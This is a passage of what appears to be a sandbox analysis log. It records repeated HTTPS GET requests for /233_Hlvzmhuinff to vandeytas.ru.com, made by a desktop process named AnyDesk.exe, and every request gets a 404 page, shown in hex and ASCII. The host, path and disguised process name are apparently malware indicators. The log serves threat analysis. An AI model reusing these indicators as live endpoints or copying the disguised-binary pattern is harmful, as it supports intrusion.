          2024-11-26 07:12:09 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          28192.168.2.64988750.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:10 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:11 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:11 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:11 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          29192.168.2.64989450.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:13 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:13 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:13 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:13 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          30192.168.2.64990150.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:15 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:16 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:15 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          31192.168.2.64990850.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:17 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:18 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:18 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:18 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          32192.168.2.64991550.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:19 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:20 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:20 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:20 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          33192.168.2.64992250.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:22 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:22 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:22 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:22 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          34192.168.2.64992950.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:24 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:24 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:24 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:24 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          35192.168.2.64993650.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:26 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:26 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:26 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:26 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          36192.168.2.64994350.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:28 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:29 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:28 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          37192.168.2.64995050.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:30 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:31 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:31 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:31 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          38192.168.2.64995750.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:33 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:33 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:33 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:33 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          39192.168.2.64996450.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:35 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:35 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:35 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          40192.168.2.64997150.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:37 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:37 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:37 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:37 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          41192.168.2.64997950.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:39 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:40 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:39 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
